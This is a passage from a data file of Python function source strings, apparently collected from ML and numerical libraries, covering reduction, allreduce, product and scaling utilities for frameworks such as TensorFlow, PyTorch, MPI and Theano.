self.sims[0].clear_data()\n # This approach is more memory efficient then building a 2D array\n # of all the data from each group and summing along an axis\n for sim in self.sims[1:]:\n self.log.debug(sim.id)\n quant = sim.get_scalar_quantity(quantity)\n self.log.debug(quant.dtype)\n group_comb += quant\n sim.clear_data()\n if avg:\n group_comb = group_comb / self.num_sims\n fname = 'scalar_reduce_avg_%s' % quantity\n else:\n fname = 'scalar_reduce_%s' % quantity\n path = os.path.join(base, fname)\n ftype = self.sims[0].conf['General']['save_as']\n if ftype == 'npz':\n np.save(path, group_comb)\n elif ftype == 'hdf5':\n self.log.warning('FIX HDF5 SCALAR REDUCE SAVING')\n np.save(path, group_comb)\n else:\n raise ValueError('Invalid file type in config')", "def Allreduce8(net, blobs, reduced_affix, gpu_indices):\n reduced = [None] * 8\n # Reduction level 1\n for i in [0, 2, 4, 6]:\n reduced[i] = net.Add(\n [blobs[i], blobs[i + 1]],\n blobs[i] + reduced_affix,\n device_option=OnGPU(gpu_indices[i])\n )\n # Reduction level 2\n for i in [0, 4]:\n reduced[i] = net.Add(\n [reduced[i], reduced[i + 2]],\n str(blobs[i]) + reduced_affix,\n device_option=OnGPU(gpu_indices[i])\n )\n # Reduction level 3: this involves a copy.\n reduced_4_copy = reduced[4].Copy(\n [],\n str(reduced[4]) + '_copy',\n device_option=OnGPU(gpu_indices[0])\n )\n reduced[0] = reduced[0].Add(\n reduced_4_copy,\n reduced[0],\n device_option=OnGPU(gpu_indices[0])\n )\n # Broadcast level 1\n reduced[4] = reduced[0].Copy(\n [],\n reduced[4],\n device_option=OnGPU(gpu_indices[4])\n )\n # Broadcast level 2\n for i in [2, 6]:\n reduced[i] = reduced[i - 2].Copy(\n [],\n reduced[i],\n device_option=OnGPU(gpu_indices[i])\n )\n # Broadcast level 3\n for i in [1, 3, 5, 7]:\n reduced[i] = reduced[i - 1].Copy(\n [],\n blobs[i] + reduced_affix,\n device_option=OnGPU(gpu_indices[i])\n )\n return reduced", "def conv_reduce_sum(x, result_shape, padding, strides):\n if len(result_shape) == 3:\n return conv2d_reduce_sum(x, result_shape[0], result_shape[1],\n padding, strides)\n elif len(result_shape) == 2:\n return conv1d_reduce_sum(x, result_shape[0], padding, strides[0])\n else:\n raise ValueError()", "def compute_all(self) -> Any:\n self._check_for_increment(\"compute_all\")\n # The i!=0 accounts for the self._base_metric should be ignored\n res = [metric.compute() for i, metric in enumerate(self) if i != 0]\n try:\n if isinstance(res[0], dict):\n keys = res[0].keys()\n return {k: torch.stack([r[k] for r in res], dim=0) for k in keys}\n if isinstance(res[0], list):\n return torch.stack([torch.stack(r, dim=0) for r in res], 0)\n return torch.stack(res, dim=0)\n except TypeError: # fallback solution to just return as it is if we cannot succesfully stack\n return res", "def all_sum(structure, name=None):\n num_replicas = get_num_replicas()\n\n if num_replicas <= 1:\n return structure\n\n tf_replicator = get_tf_replicator()\n if tf_replicator:\n return tf_replicator.all_sum(structure)\n\n elif tf.distribute.has_strategy() and tf.distribute.get_replica_context():\n return tf.distribute.get_replica_context().all_reduce(\n tf.distribute.ReduceOp.SUM, structure)\n\n elif is_tpu_replicated():\n def tpu_all_sum(tensor):\n return tpu_ops.cross_replica_sum(tensor, name=name)\n\n return nest.map_structure(tpu_all_sum, structure)\n\n return structure", "def _model_compute_all(self, inputs):\n\n return self.model.compute_all(inputs)", "def local_sum_mul_by_scalar(node):\r\n # TODO: if the the thing inside the Sum is a division,\r\n # we should get at the numerator....\r\n if isinstance(node.op, T.Sum):\r\n thing_summed, = node.inputs\r\n if thing_summed.owner and thing_summed.owner.op == T.mul:\r\n terms = thing_summed.owner.inputs\r\n scalars = [t.dimshuffle() for t in terms if\r\n numpy.all(t.type.broadcastable)]\r\n non_scalars = [t for t in terms if not numpy.all(t.broadcastable)]\r\n if scalars:\r\n if len(scalars) > 1:\r\n if len(non_scalars) > 1:\r\n return [T.mul(T.mul(*scalars),\r\n node.op(T.mul(*non_scalars)))]\r\n elif len(non_scalars) == 1:\r\n return [T.mul(T.mul(*scalars),\r\n node.op(non_scalars[0]))]\r\n else:\r\n return [T.mul(*scalars)]\r\n else:\r\n if len(non_scalars) > 1:\r\n return [T.mul(scalars[0],\r\n node.op(T.mul(*non_scalars)))]\r\n elif len(non_scalars) == 1:\r\n return [T.mul(scalars[0], node.op(non_scalars[0]))]\r\n else:\r\n return [scalars[0]]\r\n if thing_summed.owner and thing_summed.owner.op == T.neg:\r\n return [T.neg(node.op(thing_summed.owner.inputs[0]))]", "def Iallreduce(\n self,\n sendbuf: Union[DNDarray, torch.Tensor, Any],\n recvbuf: Union[DNDarray, torch.Tensor, Any],\n op: MPI.Op = MPI.SUM,\n ) -> MPIRequest:\n return MPIRequest(*self.__reduce_like(self.handle.Iallreduce, sendbuf, recvbuf, op))", "def aggregate(self, xs: List[Tensor]):\n if self.aggr == \"concat\":\n return torch.cat(xs, dim=-1)\n\n x = torch.stack(xs, dim=-1)\n if self.aggr == \"add\":\n return x.sum(dim=-1)\n elif self.aggr == \"mean\":\n return x.mean(dim=-1)\n elif self.aggr == \"max\":\n return x.max(dim=-1)[0]\n elif self.aggr == \"mul\":\n return x.prod(dim=-1)[0]", "def relay_array_reduce(c, fn, array, shape):\n assert fn.is_constant(Primitive)\n assert shape.is_constant(tuple)\n fn = fn.value\n tshp = shape.value\n ary = c.ref(array)\n if fn == P.scalar_add:\n ashp = ashape(array)\n if len(tshp) < len(ashp):\n ts = (1,) * (len(ashp) - len(tshp)) + tshp\n else:\n ts = tshp\n axis = tuple(i for i, t in enumerate(ts) if t == 1)\n res = relay.op.sum(ary, axis=axis, keepdims=True)\n if len(tshp) < len(ashp):\n rtshp = tshp\n if tshp == ():\n tshp = (1,)\n res = relay.op.reshape(res, newshape=tshp)\n if rtshp == ():\n res = relay.op.take(res, relay.const(0))\n return res\n elif fn == P.scalar_mul:\n ashp = ashape(array)\n if len(tshp) in (0, len(ashp)):\n res = relay.op.prod(ary)\n else:\n raise NotImplementedError(\n 'We currently support only full product on an array.')\n return res\n else:\n raise NotImplementedError(f\"reduce with {fn}\")", "def dim_reduce(means, weights, d):\n return dim_reduce_data(means, d)", "def _filter_and_allreduce_gradients(grads_and_vars,\n allreduce_precision=\"float32\"):\n filtered_grads_and_vars = _filter_grads(grads_and_vars)\n (grads, variables) = zip(*filtered_grads_and_vars)\n if allreduce_precision == \"float16\":\n grads = [tf.cast(grad, \"float16\") for grad in grads]\n allreduced_grads = tf.distribute.get_replica_context().all_reduce(\n tf.distribute.ReduceOp.SUM, grads)\n if allreduce_precision == \"float16\":\n allreduced_grads = [tf.cast(grad, \"float32\") for grad in allreduced_grads]\n return allreduced_grads, variables", "def _fold_to_scale(conv_wrapper: QcQuantizeWrapper, bn_wrapper: QcQuantizeWrapper):\n # pylint: disable=protected-access, too-many-locals, too-many-branches, bad-whitespace, too-many-statements\n conv = conv_wrapper._module_to_wrap\n bn = bn_wrapper._module_to_wrap\n\n weight_quantizer = conv_wrapper.param_quantizers[\"weight\"]\n\n if not isinstance(weight_quantizer, LearnedGridTensorQuantizer):\n raise _BatchNormFoldingNotSupported(\n \"BatchNorm folding to scale supports LearnedGridTensorQuantizer only; \"\n f\"got {type(weight_quantizer)}.\"\n )\n\n output_quantizer = conv_wrapper.output_quantizers[0]\n\n if output_quantizer.enabled:\n raise _BatchNormFoldingNotSupported(\n \"BatchNorm should belong to the same supergroup with the layer to be folded to.\"\n )\n\n if \"bias\" in conv_wrapper.param_quantizers:\n bias_quantizer = conv_wrapper.param_quantizers[\"bias\"]\n if bias_quantizer.enabled:\n raise _BatchNormFoldingNotSupported(\n \"Can't fold BatchNorm to scale if bias quantizer is enabled.\"\n )\n\n encodings = weight_quantizer.encoding\n\n if encodings is None:\n raise RuntimeError\n\n if isinstance(encodings, libpymo.TfEncoding):\n encodings = [encodings]\n\n if isinstance(conv, _ConvTransposeNd) and conv.groups != 1:\n raise _BatchNormFoldingNotSupported(\n \"BatchNorm folding to scale is not supported for grouped ConvTransposeNd.\"\n )\n\n # Add quantization noise to the BN params (bn weight & bn bias) before folding.\n # NOTE: Quantization of foldable batchnorms is automatically disabled when\n # initializing quantsim. However, it is still safer to call _quantize_params here\n # as we can't guarantee this is always the case.\n # For example, the user can manually enable quantization of batchnorms, etc...\n # (FYI: _quantize_params takes effect only when the parameter quantizers are enabled)\n with bn_wrapper._quantize_params():\n _fold_to_weight(conv, bn, fold_backward=True)\n\n gamma = bn.weight\n sigma = torch.sqrt(bn.running_var + bn.eps)\n\n new_encodings = []\n for old_encoding, c in zip(encodings, gamma/sigma):\n new_encoding = libpymo.TfEncoding()\n new_encoding.delta = old_encoding.delta * abs(c)\n if c >= 0:\n new_encoding.max = old_encoding.max * c\n new_encoding.min = old_encoding.min * c\n else:\n new_encoding.max = old_encoding.min * c\n new_encoding.min = old_encoding.max * c\n new_encoding.offset = old_encoding.offset\n new_encoding.bw = old_encoding.bw\n new_encodings.append(new_encoding)\n\n weight_quantizer.encoding = new_encodings\n\n # Copy batchnorm's output quantizers to conv output quantizers\n for conv_output_quantizer, bn_output_quantizer in\\\n zip(conv_wrapper.output_quantizers, bn_wrapper.output_quantizers):\n conv_output_quantizer.enabled = bn_output_quantizer.enabled\n\n if bn_output_quantizer.encoding is not None:\n encoding = libpymo.TfEncoding()\n encoding.delta = bn_output_quantizer.encoding.delta\n encoding.max = bn_output_quantizer.encoding.max\n encoding.min = bn_output_quantizer.encoding.min\n encoding.offset = bn_output_quantizer.encoding.offset\n encoding.bw = bn_output_quantizer.encoding.bw\n conv_output_quantizer.encoding = encoding\n\n bn_output_quantizer.enabled = False\n\n if \"bias\" not in conv_wrapper.param_quantizers:\n bias_quantizer = LearnedGridTensorQuantizer(weight_quantizer.bitwidth,\n weight_quantizer.round_mode,\n weight_quantizer.quant_scheme,\n weight_quantizer.use_symmetric_encodings,\n enabled_by_default=False,\n data_type=weight_quantizer.data_type)\n bias_quantizer._ch_axis = weight_quantizer._ch_axis\n conv_wrapper.param_quantizers[\"bias\"] = bias_quantizer", "def reduce(x, reduce='IncrementalPCA', ndims=3, normalize=None, align=None,\n model=None, model_params=None, internal=False):\n\n # sub functions\n def reduce_list(x, model):\n split = np.cumsum([len(xi) for xi in x])[:-1]\n x_r = np.vsplit(model.fit_transform(np.vstack(x)), split)\n if len(x)>1:\n return [xi for xi in x_r]\n else:\n return [x_r[0]]\n\n # dictionary of models\n models = {\n 'PCA' : PCA,\n 'IncrementalPCA' : IncrementalPCA,\n 'SparsePCA' : SparsePCA,\n 'MiniBatchSparsePCA' : MiniBatchSparsePCA,\n 'KernelPCA' : KernelPCA,\n 'FastICA' : FastICA,\n 'FactorAnalysis' : FactorAnalysis,\n 'TruncatedSVD' : TruncatedSVD,\n 'DictionaryLearning' : DictionaryLearning,\n 'MiniBatchDictionaryLearning' : MiniBatchDictionaryLearning,\n 'TSNE' : TSNE,\n 'Isomap' : Isomap,\n 'SpectralEmbedding' : SpectralEmbedding,\n 'LocallyLinearEmbedding' : LocallyLinearEmbedding,\n 'MDS' : MDS\n }\n\n # deprecated warning\n if (model is not None) or (model_params is not None):\n warnings.warn('Model and model params will be deprecated. Please use the \\\n reduce keyword. See API docs for more info: http://hypertools.readthedocs.io/en/latest/hypertools.tools.reduce.html#hypertools.tools.reduce')\n reduce = {}\n reduce['model'] = model\n reduce['params'] = model_params\n\n # if model is None, just return data\n if reduce is None:\n return x\n else:\n\n # common format\n x = format_data(x, ppca=True)\n\n # deprecation warnings\n if normalize is not None:\n warnings.warn('The normalize argument will be deprecated for this function. Please use the \\\n analyze function to perform combinations of these transformations. See API docs for more info: http://hypertools.readthedocs.io/en/latest/hypertools.analyze.html#hypertools.analyze')\n x = normalizer(x, normalize=normalize)\n\n if align is not None:\n warnings.warn('The align argument will be deprecated for this function. Please use the \\\n analyze function to perform combinations of these transformations. See API docs for more info: http://hypertools.readthedocs.io/en/latest/hypertools.analyze.html#hypertools.analyze')\n x = aligner(x, align=align)\n\n # if the shape of the data is already less than ndims, just return it\n if all([i.shape[1]<=ndims for i in x]):\n return x\n\n # if reduce is a string, find the corresponding model\n if type(reduce) in [str, np.string_]:\n model = models[reduce]\n model_params = {\n 'n_components' : ndims\n }\n # if its a dict, use custom params\n elif type(reduce) is dict:\n if type(reduce['model']) is str:\n model = models[reduce['model']]\n if reduce['params'] is None:\n model_params = {\n 'n_components' : ndims\n }\n else:\n model_params = reduce['params']\n if 'n_components' not in model_params:\n model_params['n_components'] = ndims\n\n # initialize model\n model = model(**model_params)\n\n # reduce data\n x_reduced = reduce_list(x, model)\n\n # return data\n if internal or len(x_reduced)>1:\n return x_reduced\n else:\n return x_reduced[0]", "def prod(tensor, axis=None):\n raise NotImplementedError", "def prod(self, axis=None, keepdims=False, dtype=None, out=None):\n return np.multiply.reduce(\n self, out=out, axis=axis, keepdims=keepdims, dtype=dtype\n )", "def scale(self, factors):\n if isinstance(factors, numbers.Number):\n factors = np.ones(self.dim) * factors;\n self.raw_wires.scale(factors);", "def AllreduceFallback(net, blobs, reduced_affix, gpu_indices):\n reduced = [None] * len(gpu_indices)\n if reduced_affix != '':\n # copy first\n reduced[0] = net.Copy(\n blobs[0],\n blobs[0] + reduced_affix,\n device_option=OnGPU(gpu_indices[0])\n )\n else:\n reduced[0] = blobs[0]\n # do temp copy and add\n temp_name = reduced[0] + '_temp_copy'\n for i in range(1, len(gpu_indices)):\n temp = net.Copy(\n blobs[i],\n temp_name,\n device_option=OnGPU(gpu_indices[0])\n )\n reduced[0] = net.Add(\n [temp, reduced[0]],\n reduced[0],\n device_option=OnGPU(gpu_indices[0])\n )\n # Broadcast to everyone else\n for i in range(1, len(gpu_indices)):\n reduced[i] = net.Copy(\n reduced[0],\n blobs[i] + reduced_affix,\n device_option=OnGPU(gpu_indices[i])\n )\n return reduced", "def minimize_using_explicit_allreduce(tape,\n optimizer,\n loss,\n trainable_variables,\n pre_allreduce_callbacks=None,\n post_allreduce_callbacks=None):\n if isinstance(optimizer,\n tf.keras.mixed_precision.LossScaleOptimizer):\n # FP16 GPU code path\n with tape:\n scaled_loss = optimizer.get_scaled_loss(loss)\n scaled_grads = tape.gradient(scaled_loss, trainable_variables)\n grads_and_vars = zip(scaled_grads, trainable_variables)\n if pre_allreduce_callbacks:\n grads_and_vars = _run_callbacks(pre_allreduce_callbacks, grads_and_vars)\n (allreduced_scaled_grads,\n filtered_training_vars) = _filter_and_allreduce_gradients(\n grads_and_vars, allreduce_precision=\"float16\")\n allreduced_unscaled_grads = optimizer.get_unscaled_gradients(\n allreduced_scaled_grads)\n grads_and_vars = zip(allreduced_unscaled_grads, filtered_training_vars)\n else:\n # TPU or FP32 GPU code path\n grads = tape.gradient(loss, trainable_variables)\n grads_and_vars = zip(grads, trainable_variables)\n if pre_allreduce_callbacks:\n grads_and_vars = _run_callbacks(pre_allreduce_callbacks, grads_and_vars)\n (allreduced_grads,\n filtered_training_vars) = _filter_and_allreduce_gradients(\n grads_and_vars, allreduce_precision=\"float32\")\n grads_and_vars = zip(allreduced_grads, filtered_training_vars)\n if post_allreduce_callbacks:\n grads_and_vars = _run_callbacks(post_allreduce_callbacks, grads_and_vars)\n optimizer.apply_gradients(\n grads_and_vars, experimental_aggregate_gradients=False)", "def __imul__(self, tensor):\n return self.mul_(tensor)", "def normalize_to_sum_one(in_tensor, tensor_rank, sum_one_indices_cnt=0):\n if sum_one_indices_cnt == 0:\n total_sum = tf.reduce_sum(in_tensor)\n return in_tensor / total_sum\n\n tensor_shape = tf.shape(in_tensor)\n sum_tensor = tf.reduce_sum(in_tensor, reduction_indices=range(sum_one_indices_cnt, tensor_rank), keep_dims=True)\n denominator = tf.tile(sum_tensor, tf.concat(0, [tf.ones([sum_one_indices_cnt], dtype=dtypes.int32),\n tensor_shape[sum_one_indices_cnt:]]))\n return in_tensor / denominator", "def all_reduce(self):\n return {k: reduce_number(v) for k, v in self.items()}", "def mpi_allreduce(data, operator: Union[int, str, None] = None):\n if operator:\n return MPI.COMM_WORLD.allreduce(data, op=Operator.operator(operator))\n else:\n return MPI.COMM_WORLD.allreduce(data)", "def all_reduce_data(grads, comm, rank, size):\r\n\r\n sendbuf_grads = []\r\n shapes = []\r\n\r\n # flatten each gradient from ndarray to list\r\n # store the shapes\r\n for grad in grads:\r\n shapes.append(grad.shape)\r\n sendbuf_grads += grad.flatten().tolist()\r\n\r\n # list is immutable and thus cannot be changed inplace by allreduce\r\n # need to convert lists to buffer-like ndarrays\r\n sendbuf_grads = np.array(sendbuf_grads)\r\n recvbuf_grads = np.zeros(len(sendbuf_grads))\r\n comm.Allreduce(sendbuf_grads, recvbuf_grads)\r\n\r\n # recover to a list of correctly shaped ndarray\r\n reduced_grads = []\r\n start = 0\r\n for shape in shapes:\r\n # NOTE: np.prod returns random result when overflow!\r\n num_elems = np.prod(shape)\r\n curr_elems = recvbuf_grads[start:start+num_elems]\r\n reduced_grads.append(np.array(curr_elems).reshape(shape))\r\n start += num_elems\r\n\r\n return reduced_grads\r\n\r\n sendbuf_grads = []\r\n shapes = []\r\n\r\n # flatten each gradient from ndarray to list\r\n # store the shapes\r\n for grad in grads:\r\n shapes.append(grad.shape)\r\n sendbuf_grads += grad.flatten().tolist()\r\n\r\n # list is immutable and thus cannot be changed inplace by allreduce\r\n # need to convert lists to buffer-like ndarrays\r\n sendbuf_grads = np.array(sendbuf_grads)\r\n recvbuf_grads = np.zeros(len(sendbuf_grads))\r\n comm.Allreduce(sendbuf_grads, recvbuf_grads)\r\n\r\n # recover to a list of correctly shaped ndarray\r\n reduced_grads = []\r\n start = 0\r\n for shape in shapes:\r\n # NOTE: np.prod returns random result when overflow!\r\n num_elems = np.prod(shape)\r\n curr_elems = recvbuf_grads[start:start + num_elems]\r\n reduced_grads.append(np.array(curr_elems).reshape(shape))\r\n start += num_elems\r\n\r\n return reduced_grads", "def local_reduce_broadcastable(node):\r\n if isinstance(node.op, T.CAReduce):\r\n reduced, = node.inputs\r\n odtype = node.outputs[0].dtype\r\n if node.op.axis is None:\r\n if all(reduced.broadcastable):\r\n return [reduced.dimshuffle().astype(odtype)]\r\n else:\r\n axis = list(node.op.axis)\r\n cuttable = [a for a in axis if reduced.broadcastable[a]]\r\n if cuttable:\r\n # -- we can remove some axes of summation,\r\n # which simplifies the codegen for sum, especially on GPU\r\n new_axis = []\r\n pattern = []\r\n ii = 0\r\n for p in range(reduced.ndim):\r\n if p not in cuttable:\r\n if p in axis:\r\n new_axis.append(ii)\r\n pattern.append(p)\r\n ii += 1\r\n new_reduced = reduced.dimshuffle(*pattern)\r\n if new_axis:\r\n if type(node.op) == theano.tensor.elemwise.CAReduce:\r\n # This happen for tensor.max(), tensor.min()\r\n new_op = node.op.__class__(node.op.scalar_op,\r\n axis=new_axis)\r\n else:\r\n new_op = node.op.__class__(axis=new_axis)\r\n return [new_op(new_reduced)]\r\n else:\r\n # -- in this case we can remove the reduction completely\r\n return [new_reduced.astype(odtype)]", "def reduce_loss(self, all_loss):\n if self._gpu_num == 1:\n total_loss = all_loss[0]\n else:\n layer_loss = [all_loss[j] for j in range(self._gpu_num)]\n total_loss = tf.reduce_mean(layer_loss)\n\n return total_loss", "def allreduce( # pylint:disable=invalid-name\n data: np.ndarray, op: Op, prepare_fun: Optional[Callable[[np.ndarray], None]] = None\n) -> np.ndarray:\n if prepare_fun is None:\n return collective.allreduce(data, collective.Op(op))\n raise Exception(\"preprocessing function is no longer supported\")", "def update_all(self, message_func=\"default\",\n reduce_func=\"default\",\n apply_node_func=\"default\"):\n num_worker_nodes = int(self.number_of_nodes() / self.num_workers) + 1\n start_node = self.worker_id * num_worker_nodes\n end_node = min((self.worker_id + 1) * num_worker_nodes, self.number_of_nodes())\n worker_nodes = np.arange(start_node, end_node, dtype=np.int64)\n self.pull(worker_nodes, message_func, reduce_func, apply_node_func, inplace=True)\n self._sync_barrier()", "def reduce_sum_encoder(inputs):\n return tf.reduce_sum(inputs, axis=1)", "def compute(self, labels, logits, weights, reduction, mask=None):\n logits = self.get_logits(logits)\n losses, loss_weights = self._compute_unreduced_loss_impl(\n labels, logits, mask)\n weights = tf.multiply(\n self._normalize_weights_impl(labels, weights), loss_weights)\n return tf.compat.v1.losses.compute_weighted_loss(\n losses, weights, reduction=reduction)", "def scaleAll(self, scale):\n center = [self.width/2, self.height/2, 0, 0]\n matrix = self.scaleMatrix(scale, scale, scale)\n\n for wireframe in self.wireframes.values():\n wireframe.scale(center, matrix)", "def test_reduce_scaling(self, data, all_numeric_reductions, skipna):\n op_name = all_numeric_reductions\n s_nm = pd.Series(data)\n # Attention: `mm` is fine here, but with `m`, the magnitudes become so small\n # that pandas discards them in the kurtosis calculation, leading to different results.\n s_mm = pd.Series(PintArray.from_1darray_quantity(data.quantity.to(ureg.mm)))\n\n # min/max with empty produce numpy warnings\n with warnings.catch_warnings():\n warnings.simplefilter(\"ignore\", RuntimeWarning)\n r_nm = getattr(s_nm, op_name)(skipna=skipna)\n r_mm = getattr(s_mm, op_name)(skipna=skipna)\n if isinstance(r_nm, ureg.Quantity):\n # convert both results to the same units, then take the magnitude\n v_nm = r_nm.m_as(r_mm.units)\n v_mm = r_mm.m\n else:\n v_nm = r_nm\n v_mm = r_mm\n assert np.isclose(v_nm, v_mm, rtol=1e-3), f\"{r_nm} == {r_mm}\"", "def __mul__(self, tensor):\n return self.mul(tensor)", "def scale(self, state, action):\n control_action = action[..., : self._true_dim_action[0]]\n scale = super().scale(state, control_action)\n\n return scale", "def squash(vectors, axis=-1):\n s_squared_norm = K.sum(K.square(vectors), axis, keepdims=True)\n scale = s_squared_norm / (1 + s_squared_norm)/ K.sqrt(s_squared_norm)\n return scale * vectors", "def scaled_reduce_dict_to_tensor(dataset_grad_p_dict: Mapping[str,torch.Tensor], dataset_names: List[str], scales=Mapping[str,float]):\n assert len(dataset_grad_p_dict.values()) > 0\n\n item0 = list(dataset_grad_p_dict.values())[0]\n sum_tensor = torch.zeros_like(item0)\n for dname in dataset_names:\n sum_tensor += scales[dname] * dataset_grad_p_dict[dname]\n\n return sum_tensor", "def reduce_sum(\n input_tensor: remote_blob_util.BlobDef,\n axis: Optional[Union[int, Sequence[int]]] = None,\n keepdims: bool = False,\n name: Optional[str] = None,\n) -> remote_blob_util.BlobDef:\n name = _gen_unique_name_if_need(name, \"ReduceSum_\")\n\n axis = _check_axis(axis, input_tensor.shape)\n if len(axis) == 0:\n return input_tensor\n\n op = (\n flow.user_op_builder(name)\n .Op(\"reduce_sum\")\n .Input(\"input_tensor\", [input_tensor])\n .Output(\"output_tensor\")\n .Attr(\"axis\", axis)\n .Attr(\"keepdims\", keepdims)\n .Build()\n )\n return op.InferAndTryRun().SoleOutputBlob()", "def reduce_sum_d(x, y, axis=None, keepdims=None, kernel_name=\"reduce_sum_d\"):\n\n dtype = x[\"dtype\"]\n dtype_lower = dtype.lower()\n check_list = (\"float16\", \"float32\")\n check_dtype(dtype_lower, check_list, param_name=\"x\")\n\n with te.op.compute():\n shape = x[\"shape\"]\n shape_range = x[\"range\"]\n\n axes = []\n shape_len = len(shape)\n if not axis:\n for i, _ in enumerate(shape):\n axes.append(i)\n else:\n axes = list(axis)\n axes = cce_util.axis_check(shape_len, axes)\n\n shape_new, shape_range_new, axes_new, fused_rel_dic = \\\n fused_reduce_axis(shape, shape_range, axes)\n\n add_compile_info(\"fused_rel_dic\", fused_rel_dic)\n x[\"shape\"] = shape_new\n x[\"range\"] = shape_range_new\n shape_var_new = variable_shape([x])[0]\n\n data_input = tvm.placeholder(shape_var_new, name=\"data_input\",\n dtype=dtype_lower)\n res = reduce_sum_d_compute(data_input, y, axes_new, keepdims)\n\n with tvm.target.cce():\n sch = generic.auto_schedule(res)\n\n # build\n config = {\"name\": kernel_name,\n \"tensor_list\": [data_input, res]}\n te.lang.dynamic.build(sch, config)", "def prod(iterable):\n \n return reduce(operator.mul, iterable, 1)", "def _shrink(values, last_dim, reduction_factor):\n\n shape = tf.shape(values)\n new_shape = [\n shape[0],\n shape[1] // reduction_factor,\n last_dim * reduction_factor\n ]\n values = tf.reshape(values, new_shape)\n return values", "def average(self, tensors, batch_size=None):\n # check the arguments and try the fast path: only one tensor\n tensors = list(tensors)\n if not tensors:\n return []\n length = len(tensors[0])\n if length == 0:\n raise ValueError('`tensors` must be list of non-empty Tensor '\n 'lists.')\n for t in tensors[1:]:\n if len(t) != length:\n raise ValueError('`tensors` must be list of Tensor lists of '\n 'the same length.')\n if length == 1:\n return [t[0] for t in tensors]\n\n # do the slow path: average all tensors\n with tf.device(self.main_device), tf.name_scope('average_tensors'):\n if batch_size is None:\n return [tf.reduce_mean(tf.stack(t), axis=0) for t in tensors]\n\n k = len(self.work_devices)\n slice_len = (batch_size + k - 1) // k\n last_slice_size = batch_size - (k - 1) * slice_len\n\n if is_tensor_object(batch_size):\n to_float = tf.to_float\n else:\n to_float = float\n\n float_batch_size = to_float(batch_size)\n weights = tf.stack(\n [to_float(slice_len) / float_batch_size] * (k - 1) +\n [to_float(last_slice_size) / float_batch_size]\n )\n\n return [tf.reduce_sum(tf.stack(t) * weights, axis=0)\n for t in tensors]", "def ol_mpi_allreduce(data, operator: Union[int, str, None] = None):\n import numba_mpi\n\n if operator is None or isinstance(operator, nb.types.NoneType):\n op_id = -1 # value will not be used\n elif isinstance(operator, nb.types.misc.StringLiteral):\n op_id = Operator.id(operator.literal_value)\n elif isinstance(operator, nb.types.misc.Literal):\n op_id = int(operator)\n else:\n raise RuntimeError(\"`operator` must be a literal type\")\n\n @register_jitable\n def _allreduce(sendobj, recvobj, operator: Union[int, str, None] = None) -> int:\n \"\"\"helper function that calls `numba_mpi.allreduce`\"\"\"\n if operator is None:\n return numba_mpi.allreduce(sendobj, recvobj) # type: ignore\n else:\n return numba_mpi.allreduce(sendobj, recvobj, op_id) # type: ignore\n\n if isinstance(data, types.Number):\n\n def impl(data, operator: Union[int, str, None] = None):\n \"\"\"reduce a single number across all cores\"\"\"\n sendobj = np.array([data])\n recvobj = np.empty((1,), sendobj.dtype)\n status = _allreduce(sendobj, recvobj, operator)\n assert status == 0\n return recvobj[0]\n\n elif isinstance(data, types.Array):\n\n def impl(data, operator: Union[int, str, None] = None):\n \"\"\"reduce an array across all cores\"\"\"\n recvobj = np.empty(data.shape, data.dtype)\n status = _allreduce(data, recvobj, operator)\n assert status == 0\n return recvobj\n\n else:\n raise TypeError(f\"Unsupported type {data.__class__.__name__}\")\n\n return impl", "def all_reduce_sum_gradients(grads_and_vars):\n grads_and_vars = list(grads_and_vars)\n filtered_grads_and_vars = filter_empty_gradients(grads_and_vars)\n if filtered_grads_and_vars:\n if strategy_supports_no_merge_call():\n grads = [pair[0] for pair in filtered_grads_and_vars]\n reduced = distribute_lib.get_strategy().extended._replica_ctx_all_reduce( # pylint: disable=protected-access\n ds_reduce_util.ReduceOp.SUM, grads)\n else:\n # TODO(b/183257003): Remove this branch\n reduced = distribute_lib.get_replica_context().merge_call(\n _all_reduce_sum_fn, args=(filtered_grads_and_vars,))\n else:\n reduced = []\n # Copy 'reduced' but add None gradients back in\n reduced_with_nones = []\n reduced_pos = 0\n for g, v in grads_and_vars:\n if g is None:\n reduced_with_nones.append((None, v))\n else:\n reduced_with_nones.append((reduced[reduced_pos], v))\n reduced_pos += 1\n assert reduced_pos == len(reduced), \"Failed to add all gradients\"\n return reduced_with_nones", "def prod(iterable):\n return reduce(operator.mul, iterable, 1)", "def prod(iterable):\n return reduce(operator.mul, iterable, 1)", "def prod(iterable):\n return reduce(operator.mul, iterable, 1)", "def constraint_scaling_transform_undo(c):\n if not isinstance(c, _ConstraintData):\n raise TypeError(f\"{c} is not a constraint or is an indexed constraint\")\n v = get_constraint_transform_applied_scaling_factor(c)\n if v is None:\n return # hasn't been transformed, so nothing to do.\n __scale_constraint(c, 1 / v)\n __unset_constraint_transform_applied_scaling_factor(c)", "def reduce(self, reduce_op, value, axis): # pylint: disable=useless-super-delegation\n return super(OneDeviceStrategy, self).reduce(reduce_op, value, axis)", "def scale(self, scale_factor: float) -> None:\n self.tensor[:, :3] *= scale_factor", "def prod(lst):\n return reduce(mul, lst, 1)", "def call(self, inputs, *args, **kwargs):\n batch_dims = inputs.shape[:nest_utils.get_outer_rank(inputs, self._spec)]\n num_batch_elems = tf.reduce_prod(batch_dims)\n transformed_inputs = tf.reshape(inputs, (num_batch_elems, -1))\n result = self._batch(transformed_inputs, *args, **kwargs)\n return tf.reshape(result, inputs.shape)", "def compute_all(self) -> None:\n self.compute_j_matrix()\n self.compute_outter_distribution()\n self.compute_max_prior()\n self.compute_max_poutter()", "def convert_prod(node, **kwargs):\n name, input_nodes, attrs = get_inputs(node, kwargs)\n\n mx_axis = attrs.get(\"axis\", None)\n axes = convert_string_to_list(str(mx_axis)) if mx_axis is not None else None\n\n keepdims = get_boolean_attribute_value(attrs, \"keepdims\")\n\n if axes is not None:\n node = onnx.helper.make_node(\n 'ReduceProd',\n inputs=input_nodes,\n outputs=[name],\n axes=axes,\n keepdims=keepdims,\n name=name\n )\n\n return [node]\n else:\n node = onnx.helper.make_node(\n 'ReduceProd',\n inputs=input_nodes,\n outputs=[name],\n keepdims=keepdims,\n name=name\n )\n\n return [node]", "def sum(x, reduce_instance_dims=True, name=None): # pylint: disable=redefined-builtin\n return _numeric_combine(x, np.sum, reduce_instance_dims, name)", "def allgather(self, tensor, name, shape, dtype, context):\n assert isinstance(tensor, nd.NDArray), type(tensor)\n assert isinstance(name, str), type(name)\n assert isinstance(shape, tuple), type(shape)\n assert isinstance(dtype, str), type(dtype)\n assert isinstance(context, mx.context.Context), type(context)\n total_tensor = self.get_ndarray(context=context,\n name=name,\n shape=shape,\n dtype=dtype)\n total_tensor[:] = 0 # reset array before all-reduce is very important\n total_tensor[self.rank * 